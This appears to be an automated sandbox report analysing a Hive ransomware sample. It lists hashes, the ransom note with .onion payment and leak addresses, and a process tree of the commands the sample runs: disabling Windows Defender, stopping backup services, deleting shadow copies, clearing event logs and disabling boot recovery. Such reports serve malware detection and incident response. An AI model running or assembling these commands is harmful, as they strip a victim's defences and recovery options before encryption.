Overview

overview

10

Static

static

3

12baa6c83e...be.exe

windows7-x64

10

12baa6c83e...be.exe

windows10-2004-x64

10

Resubmissions

22/01/2025, 09:38

250122-lmelbazrfn 10

22/11/2021, 10:55

211122-m1hessacf4 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/01/2025, 09:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    12baa6c83e6f8b059e7f14cb67bdad4e917b90bc8a139b5379a4b42a0c92a6be.exe

  • Size

    2.7MB

  • MD5

    feb8f145c403b56d85ef7c662f169428

  • SHA1

    45fbb554666bffa433eed118cd6fcbd069b3fa25

  • SHA256

    12baa6c83e6f8b059e7f14cb67bdad4e917b90bc8a139b5379a4b42a0c92a6be

  • SHA512

    a69260bc132bc17607e48cafcd8278484e0ea4a7ad8d11559560b4589f4016aeae8dce89451735494860f4085098e20de400e4bfd189e7a6f7a61981299bc281

  • SSDEEP

    49152:w+bUJqQ5lrb/T1vO90dL3BmAFd4A64nsfJj3y8pYeTmGS1NDDCqYzPr8bg11Vgjg:nbs5O3y8BTlz0i4JxOww

Score
10/10
hivedefense_evasionevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\BKFP_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: MU6miDRbaLqn Password: sAF5rTMdamZ3cbgVLiDY To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.4v5et files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\12baa6c83e6f8b059e7f14cb67bdad4e917b90bc8a139b5379a4b42a0c92a6be.exe
    "C:\Users\Admin\AppData\Local\Temp\12baa6c83e6f8b059e7f14cb67bdad4e917b90bc8a139b5379a4b42a0c92a6be.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3152
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:676
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:1508
        • C:\Windows\SYSTEM32\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1948
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:3948
          • C:\Windows\SYSTEM32\net.exe
            net.exe stop "vmicvss" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:536
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "vmicvss" /y
              3⤵
                PID:4032
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "VSS" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1936
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "VSS" /y
                3⤵
                  PID:3708
              • C:\Windows\SYSTEM32\net.exe
                net.exe stop "wbengine" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:3196
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "wbengine" /y
                  3⤵
                    PID:2860
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "WebClient" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4544
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "WebClient" /y
                    3⤵
                      PID:3212
                  • C:\Windows\SYSTEM32\net.exe
                    net.exe stop "UnistoreSvc_287ca" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2340
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "UnistoreSvc_287ca" /y
                      3⤵
                        PID:3596
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SamSs" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1420
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SDRSVC" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:1316
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "SstpSvc" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:384
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "vmicvss" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2244
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "VSS" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2196
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "wbengine" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:680
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "WebClient" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:2724
                    • C:\Windows\SYSTEM32\sc.exe
                      sc.exe config "UnistoreSvc_287ca" start= disabled
                      2⤵
                      • Launches sc.exe
                      PID:3796
                    • C:\Windows\SYSTEM32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                      • Modifies Security services
                      PID:4664
                    • C:\Windows\SYSTEM32\reg.exe
                      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                      2⤵
                        PID:1340
                      • C:\Windows\SYSTEM32\reg.exe
                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                        2⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        PID:4512
                      • C:\Windows\SYSTEM32\reg.exe
                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                        2⤵
                          PID:1956
                        • C:\Windows\SYSTEM32\reg.exe
                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                          2⤵
                            PID:3940
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            2⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2972
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            2⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1120
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            2⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2108
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            2⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:700
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            2⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1432
                          • C:\Windows\SYSTEM32\reg.exe
                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            2⤵
                              PID:3208
                            • C:\Windows\SYSTEM32\reg.exe
                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              2⤵
                                PID:3448
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                2⤵
                                  PID:3984
                                • C:\Windows\SYSTEM32\reg.exe
                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                  2⤵
                                    PID:4052
                                  • C:\Windows\SYSTEM32\reg.exe
                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:4136
                                    • C:\Windows\SYSTEM32\reg.exe
                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:2024
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                        2⤵
                                          PID:1260
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                          2⤵
                                            PID:4108
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                            2⤵
                                              PID:1924
                                            • C:\Windows\SYSTEM32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              2⤵
                                                PID:4612
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                2⤵
                                                  PID:3232
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                  2⤵
                                                    PID:4732
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                    2⤵
                                                      PID:1816
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                      2⤵
                                                        PID:3476
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                        2⤵
                                                          PID:1092
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                          2⤵
                                                            PID:4860
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                            2⤵
                                                              PID:3908
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies Security services
                                                              PID:1424
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies Security services
                                                              PID:1728
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies Security services
                                                              PID:1548
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies Security services
                                                              PID:2672
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies security service
                                                              PID:4820
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                              2⤵
                                                              • Modifies Security services
                                                              PID:1772
                                                            • C:\Windows\SYSTEM32\vssadmin.exe
                                                              vssadmin.exe delete shadows /all /quiet
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:1908
                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                              wevtutil.exe cl system
                                                              2⤵
                                                              • Clears Windows event logs
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1456
                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                              wevtutil.exe cl security
                                                              2⤵
                                                              • Clears Windows event logs
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4284
                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                              wevtutil.exe cl application
                                                              2⤵
                                                              • Clears Windows event logs
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1436
                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                              wmic.exe SHADOWCOPY /nointeractive
                                                              2⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:212
                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                              wmic.exe shadowcopy delete
                                                              2⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1524
                                                            • C:\Windows\SYSTEM32\bcdedit.exe
                                                              bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                              2⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:3244
                                                            • C:\Windows\SYSTEM32\bcdedit.exe
                                                              bcdedit.exe /set {default} recoveryenabled no
                                                              2⤵
                                                              • Modifies boot configuration data using bcdedit
                                                              PID:4064
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                              2⤵
                                                                PID:3140
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                2⤵
                                                                  PID:3700
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Set-MpPreference -DisableIOAVProtection $true
                                                                    3⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4588
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                  2⤵
                                                                    PID:2324
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                      3⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1628

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Reconnaissance

                                                                Resource Development

                                                                Initial Access

                                                                Execution

                                                                Command and Scripting Interpreter

                                                                1
                                                                T1059

                                                                PowerShell

                                                                1
                                                                T1059.001

                                                                System Services

                                                                1
                                                                T1569

                                                                Service Execution

                                                                1
                                                                T1569.002

                                                                Windows Management Instrumentation

                                                                1
                                                                T1047

                                                                Persistence

                                                                Create or Modify System Process

                                                                4
                                                                T1543

                                                                Windows Service

                                                                4
                                                                T1543.003

                                                                Privilege Escalation

                                                                Create or Modify System Process

                                                                4
                                                                T1543

                                                                Windows Service

                                                                4
                                                                T1543.003

                                                                Defense Evasion

                                                                Direct Volume Access

                                                                1
                                                                T1006

                                                                Impair Defenses

                                                                3
                                                                T1562

                                                                Disable or Modify Tools

                                                                2
                                                                T1562.001

                                                                Indicator Removal

                                                                3
                                                                T1070

                                                                Clear Windows Event Logs

                                                                1
                                                                T1070.001

                                                                File Deletion

                                                                2
                                                                T1070.004

                                                                Modify Registry

                                                                4
                                                                T1112

                                                                Credential Access

                                                                Credentials from Password Stores

                                                                1
                                                                T1555

                                                                Credentials from Web Browsers

                                                                1
                                                                T1555.003

                                                                Unsecured Credentials

                                                                1
                                                                T1552

                                                                Credentials In Files

                                                                1
                                                                T1552.001

                                                                Discovery

                                                                Query Registry

                                                                1
                                                                T1012

                                                                Lateral Movement

                                                                Collection

                                                                Data from Local System

                                                                1
                                                                T1005

                                                                Command and Control

                                                                Exfiltration

                                                                Impact

                                                                Inhibit System Recovery

                                                                3
                                                                T1490

                                                                Service Stop

                                                                1
                                                                T1489

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Program Files\BKFP_HOW_TO_DECRYPT.txt
                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  b6b8cc6d06ad1f1d600ea83d5d047717

                                                                  SHA1

                                                                  9a702319932fc88a46cbb03be129ead42be82903

                                                                  SHA256

                                                                  e12798393cd3714b7bc4a7ef9eb6249ee6614d9f6e5da7a2fd9e3b7dfac78435

                                                                  SHA512

                                                                  261d23f484cde2ede1c5d4e5743b711e4110c36951af81152b6d9acfc6c92ca129dd1271fabc2da4064c32096d460884f4b07986ddf085ac15644f9d41975144

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                  SHA1

                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                  SHA256

                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                  SHA512

                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                  Filesize

                                                                  944B

                                                                  MD5

                                                                  62623d22bd9e037191765d5083ce16a3

                                                                  SHA1

                                                                  4a07da6872672f715a4780513d95ed8ddeefd259

                                                                  SHA256

                                                                  95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                  SHA512

                                                                  9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrzk2s0x.fy3.ps1
                                                                  Filesize

                                                                  60B

                                                                  MD5

                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                  SHA1

                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                  SHA256

                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                  SHA512

                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                  Download Submit

                                                                • memory/4588-11-0x0000021EE1320000-0x0000021EE1342000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                  Download